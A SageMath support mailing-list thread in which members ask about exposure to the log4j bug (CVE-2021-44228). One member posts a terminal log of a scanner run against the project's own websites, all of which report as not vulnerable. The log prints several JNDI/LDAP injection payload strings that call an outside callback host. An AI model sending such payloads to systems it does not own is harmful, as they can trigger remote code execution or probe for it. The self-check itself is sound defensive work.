Has anyone more knowledgeable than I (admittedly a low bar) about sage's internals (admittedly a low bar) thought about whether sage uses any libraries that make it vulnerable to the log4j vulnerability?-Angela
--
You received this message because you are subscribed to the Google Groups "sage-support" group.
To unsubscribe from this group and stop receiving emails from it, send an email to sage-support...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/sage-support/c944dbbe-d640-4a25-b9e8-9c0f0c13b437n%40googlegroups.com.
You received this message because you are subscribed to a topic in the Google Groups "sage-support" group.
To unsubscribe from this topic, visit https://groups.google.com/d/topic/sage-support/Rq6AzAS5G30/unsubscribe.
To unsubscribe from this group and all its topics, send an email to sage-support...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/sage-support/CACLE5GCkiYVthOOH3kCc3u2wv8VtGQg7y-fiZjDj%3Dvo20qdq_Q%40mail.gmail.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/sage-support/CABJmdsVheJcdHnUhKuFqkw%3DFaSHXTuHFzqS%3D%2Bm4-KNwTn58HUg%40mail.gmail.com.
Hello folks,In case you are concerned that you may be impacted by the Java log4j bug, you can download this application which will check if a supplied url is vulnerable to the bug:
Last login: Tue Dec 14 16:45:00 on ttys058
wstein@max ~ % python3 log4j-scan.py -u https://ask.sagemath.org
/Library/Frameworks/Python.framework/Versions/3.10/bin/python3: can't open file '/Users/wstein/log4j-scan.py': [Errno 2] No such file or directory
wstein@max ~ % cd /tmp/log4j-scan
wstein@max log4j-scan % python3 log4j-scan.py -u https://ask.sagemath.org
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
[•] Initiating DNS callback server (interact.sh).
[%] Checking for Log4j RCE CVE-2021-44228.
[•] URL: https://ask.sagemath.org
[•] URL: https://ask.sagemath.org | PAYLOAD: ${jndi:ldap://ask.sagemath.org.9187j80iik2n4oq9ud1re041i81939unm.interact.sh/tjtni2c}
[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
[•] Waiting...
[•] Targets does not seem to be vulnerable.
wstein@max log4j-scan % python3 log4j-scan.py -u https://wiki.sagemath.org
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
[•] Initiating DNS callback server (interact.sh).
[%] Checking for Log4j RCE CVE-2021-44228.
[•] URL: https://wiki.sagemath.org
[•] URL: https://wiki.sagemath.org | PAYLOAD: ${jndi:ldap://wiki.sagemath.org.5607rfj3i02047m4itt61pu684hsv539c.interact.sh/zpbgczb}
[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
[•] Waiting...
[•] Targets does not seem to be vulnerable.
wstein@max log4j-scan % python3 log4j-scan.py -u https://trac.sagemath.org
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
[•] Initiating DNS callback server (interact.sh).
[%] Checking for Log4j RCE CVE-2021-44228.
[•] URL: https://trac.sagemath.org
[•] URL: https://trac.sagemath.org | PAYLOAD: ${jndi:ldap://trac.sagemath.org.xgge21465p6t46hq87n64t350054fg25o.interact.sh/kjy8og1}
[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
[•] Waiting...
[•] Targets does not seem to be vulnerable.
wstein@max log4j-scan % python3 log4j-scan.py -u https://www.sagemath.org
[•] CVE-2021-44228 - Apache Log4j RCE Scanner
[•] Scanner provided by FullHunt.io - The Next-Gen Attack Surface Management Platform.
[•] Secure your External Attack Surface with FullHunt.io.
[•] Initiating DNS callback server (interact.sh).
[%] Checking for Log4j RCE CVE-2021-44228.
[•] URL: https://www.sagemath.org
[•] URL: https://www.sagemath.org | PAYLOAD: ${jndi:ldap://www.sagemath.org.bx6i660og07o49v6qb2f9ou48r846433j.interact.sh/1qs7xvd}
[•] Payloads sent to all URLs. Waiting for DNS OOB callbacks.
[•] Waiting...
[•] Targets does not seem to be vulnerable.
wstein@max log4j-scan %